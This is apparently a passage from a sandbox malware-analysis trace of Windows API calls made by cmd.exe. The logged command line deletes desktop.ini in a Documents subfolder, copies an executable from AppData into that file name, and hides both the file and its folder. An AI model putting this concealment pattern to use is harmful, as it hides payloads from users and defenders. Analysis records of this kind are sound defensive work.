AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.652] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fdc4, dwLength=0x1c | out: lpBuffer=0x12fdc4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.652] GetConsoleOutputCP () returned 0x1b5 [0130.652] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.653] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.653] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.653] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.654] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.654] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.654] GetEnvironmentStringsW () returned 0x2004a0* [0130.654] FreeEnvironmentStringsW (penv=0x2004a0) returned 1 [0130.654] GetEnvironmentStringsW () returned 0x2004a0* [0130.654] FreeEnvironmentStringsW (penv=0x2004a0) returned 1 [0130.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed64 | out: phkResult=0x12ed64*=0x40) returned 0x0 
[0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x50, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x0, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.654] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegCloseKey (hKey=0x40) returned 0x0 [0130.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ed64 | out: phkResult=0x12ed64*=0x40) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x40, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x1, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x0, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x9, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x4, lpData=0x12ed70*=0x9, lpcbData=0x12ed68*=0x4) returned 0x0 [0130.655] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ed6c, lpData=0x12ed70, lpcbData=0x12ed68*=0x1000 | out: lpType=0x12ed6c*=0x0, lpData=0x12ed70*=0x9, lpcbData=0x12ed68*=0x1000) returned 0x2 [0130.655] RegCloseKey (hKey=0x40) returned 0x0 [0130.655] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.655] srand (_Seed=0x5b886365) [0130.655] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" [0130.655] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" [0130.655] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.656] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x201c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.656] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.656] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.656] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.656] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.656] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.656] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.656] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.656] _wcsicmp (_String1="PROMPT", 
_String2="DATE") returned 12 [0130.656] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.656] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.656] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.656] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.656] GetEnvironmentStringsW () returned 0x2025f0* [0130.657] FreeEnvironmentStringsW (penv=0x2025f0) returned 1 [0130.657] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.657] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.657] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.657] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.657] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.657] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.657] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.657] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.657] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.657] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fb30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.657] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fb30, lpFilePart=0x12fb2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fb2c*="Desktop") returned 0x18 [0130.657] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.657] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f8ac | out: lpFindFileData=0x12f8ac) returned 0x200c80 [0130.657] FindClose (in: hFindFile=0x200c80 | out: hFindFile=0x200c80) 
returned 1 [0130.658] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f8ac | out: lpFindFileData=0x12f8ac) returned 0x200c80 [0130.658] FindClose (in: hFindFile=0x200c80 | out: hFindFile=0x200c80) returned 1 [0130.658] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f8ac | out: lpFindFileData=0x12f8ac) returned 0x200c80 [0130.658] FindClose (in: hFindFile=0x200c80 | out: hFindFile=0x200c80) returned 1 [0130.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.658] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.658] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.658] GetEnvironmentStringsW () returned 0x2004a0* [0130.658] FreeEnvironmentStringsW (penv=0x2004a0) returned 1 [0130.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.659] GetConsoleOutputCP () returned 0x1b5 [0130.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.659] GetUserDefaultLCID () returned 0x409 [0130.659] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fc70, cchData=128 | out: lpLCData="0") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fc70, cchData=128 | out: lpLCData="0") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fc70, cchData=128 | out: lpLCData="1") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") 
returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.660] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.660] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.661] GetConsoleTitleW (in: lpConsoleTitle=0x1f0ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.662] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.662] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.662] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.663] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0130.663] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0130.663] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0130.663] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0130.663] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0130.663] _wcsicmp (_String1="REM", _String2="attrib") returned 17 
[0130.663] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0130.666] _wcsicmp (_String1="del", _String2=")") returned 59 [0130.666] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0130.666] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0130.666] _wcsicmp (_String1="IF", _String2="del") returned 5 [0130.666] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0130.666] _wcsicmp (_String1="REM", _String2="del") returned 14 [0130.666] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0130.668] _wcsicmp (_String1="type", _String2=")") returned 75 [0130.668] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0130.668] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0130.668] _wcsicmp (_String1="IF", _String2="type") returned -11 [0130.668] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0130.668] _wcsicmp (_String1="REM", _String2="type") returned -2 [0130.668] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0130.784] SetErrorMode (uMode=0x0) returned 0x0 [0130.784] SetErrorMode (uMode=0x1) returned 0x0 [0130.784] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2004a8, lpFilePart=0x12f424 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f424*="Desktop") returned 0x18 [0130.784] SetErrorMode (uMode=0x0) returned 0x1 [0130.785] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.785] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.790] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.790] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0xffffffff [0130.790] GetLastError () returned 0x2 [0130.790] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0xffffffff [0130.791] GetLastError () returned 0x2 [0130.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0x202530 [0130.791] FindClose (in: hFindFile=0x202530 | out: hFindFile=0x202530) returned 1 [0130.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0xffffffff [0130.791] GetLastError () returned 0x2 [0130.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0x202530 [0130.791] FindClose (in: hFindFile=0x202530 | out: hFindFile=0x202530) returned 1 [0130.791] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.791] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.791] GetConsoleTitleW (in: lpConsoleTitle=0x12f698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.792] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f5e8 | out: lpAttributeList=0x12f520, lpSize=0x12f5e8) returned 1 [0130.792] UpdateProcThreadAttribute (in: lpAttributeList=0x12f520, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f5e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f520, lpPreviousValue=0x0) returned 1 [0130.792] 
GetStartupInfoW (in: lpStartupInfo=0x12f4dc | out: lpStartupInfo=0x12f4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0130.792] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.793] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f57c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f5c8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessInformation=0x12f5c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9d4, dwThreadId=0x9cc)) returned 1 [0130.840] CloseHandle (hObject=0x4c) returned 1 [0130.840] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.840] GetEnvironmentStringsW () returned 0x2009d0* [0130.840] FreeEnvironmentStringsW (penv=0x2009d0) returned 1 [0130.840] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0131.037] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f4bc | out: lpExitCode=0x12f4bc*=0x0) returned 1 [0131.037] CloseHandle (hObject=0x50) returned 1 [0131.038] _vsnwprintf (in: _Buffer=0x12f604, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x12f4c8 | out: _Buffer="00000000") returned 8 [0131.038] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0131.038] GetEnvironmentStringsW () returned 0x202580* [0131.038] FreeEnvironmentStringsW (penv=0x202580) returned 1 [0131.038] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.038] GetEnvironmentStringsW () returned 0x202580* [0131.038] FreeEnvironmentStringsW (penv=0x202580) returned 1 [0131.038] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f520 | out: lpAttributeList=0x12f520) [0131.038] GetConsoleTitleW (in: lpConsoleTitle=0x12f8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.038] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e918, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12e91c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e918*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0131.039] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0131.039] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0131.039] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0131.039] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\desktop.ini")) returned 0xffffffff [0131.039] GetLastError () returned 0x2 [0131.039] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x10 [0131.039] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0131.039] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0131.039] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini" (normalized: 
"c:\\users\\eebsym5\\docume~1\\fcfnne~1\\desktop.ini")) returned 0xffffffff [0131.039] GetLastError () returned 0x2 [0131.039] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x20360c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20360c) returned 0xffffffff [0131.040] GetLastError () returned 0x2 [0131.040] _get_osfhandle (_FileHandle=2) returned 0xb [0131.040] GetFileType (hFile=0xb) returned 0x2 [0131.040] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0131.040] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f318 | out: lpMode=0x12f318) returned 1 [0131.041] _get_osfhandle (_FileHandle=2) returned 0xb [0131.041] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12f34c | out: lpConsoleScreenBufferInfo=0x12f34c) returned 1 [0131.042] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0131.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.042] GetFileType (hFile=0x7) returned 0x2 [0131.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fa3c | out: lpMode=0x12fa3c) returned 1 [0131.043] _dup (_FileHandle=1) returned 3 [0131.043] _close (_FileHandle=1) returned 0 [0131.043] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini", _String2="con") returned -53 [0131.043] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12fa0c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0131.043] 
_open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0131.043] GetConsoleTitleW (in: lpConsoleTitle=0x12f83c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.043] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x12f3a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f3a0) returned 0x200820 [0131.044] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0131.044] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0131.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0131.044] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12e2ac, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0131.044] 